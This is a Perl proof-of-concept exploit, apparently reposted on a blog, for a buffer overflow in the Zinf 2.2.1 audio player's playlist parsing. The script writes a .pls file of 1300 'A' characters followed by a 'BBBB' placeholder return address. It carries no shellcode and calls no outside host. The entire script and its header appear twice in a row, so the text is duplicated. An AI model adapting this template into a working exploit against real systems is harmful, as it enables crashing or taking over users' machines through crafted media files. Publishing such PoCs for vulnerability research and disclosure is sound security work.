#!/usr/bin/perl
#
# Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Summary: The Zinf audio player is a simple, but powerful audio player for Linux and
# Win32. It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast HTTP
# streaming, RTP streaming, a powerful music browser, theme support and a download manager.
#
# Product web page: http://www.zinf.org/
#
# Desc: Zinf is reported prone to a remote buffer overflow vulnerability when processing
# malformed playlist files. This issue exists due to insufficient boundary checks performed
# by the application and may allow an attacker to gain unauthorized access to a vulnerable
# computer. Reportedly, this issue affects Zinf version 2.2.1 for Windows. Zinf version 2.2.5
# for Linux is reportedly fixed, however, this is not confirmed at the moment.
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Refs:
#
# - http://www.securityfocus.com/bid/11248
# - http://www.milw0rm.com/exploits/559
#
# Vulnerability discovered by Luigi Auriemma (24.11.2004)
#
# Coded by Gjoko "LiquidWorm" Krstic
#
# liquidworm [At] gmail.com
#
# http://www.zeroscience.org
#
# 14.08.2008
#
$buffer = "A" x 1300;
$ret = "BBBB";
open(pls, ">./zinf_list.pls");
print pls $buffer.$ret;
print "\n--> PoC Playlist created...\n";
#
# Zinf 2.2.1 PLF/M3U/GQMPEG Playlist File Remote Buffer Overflow Exploit
#
# Summary: The Zinf audio player is a simple, but powerful audio player for Linux and
# Win32. It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast HTTP
# streaming, RTP streaming, a powerful music browser, theme support and a download manager.
#
# Product web page: http://www.zinf.org/
#
# Desc: Zinf is reported prone to a remote buffer overflow vulnerability when processing
# malformed playlist files. This issue exists due to insufficient boundary checks performed
# by the application and may allow an attacker to gain unauthorized access to a vulnerable
# computer. Reportedly, this issue affects Zinf version 2.2.1 for Windows. Zinf version 2.2.5
# for Linux is reportedly fixed, however, this is not confirmed at the moment.
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Refs:
#
# - http://www.securityfocus.com/bid/11248
# - http://www.milw0rm.com/exploits/559
#
# Vulnerability discovered by Luigi Auriemma (24.11.2004)
#
# Coded by Gjoko "LiquidWorm" Krstic
#
# liquidworm [At] gmail.com
#
# http://www.zeroscience.org
#
# 14.08.2008
#
$buffer = "A" x 1300;
$ret = "BBBB";
open(pls, ">./zinf_list.pls");
print pls $buffer.$ret;
print "\n--> PoC Playlist created...\n";
No comments:
Post a Comment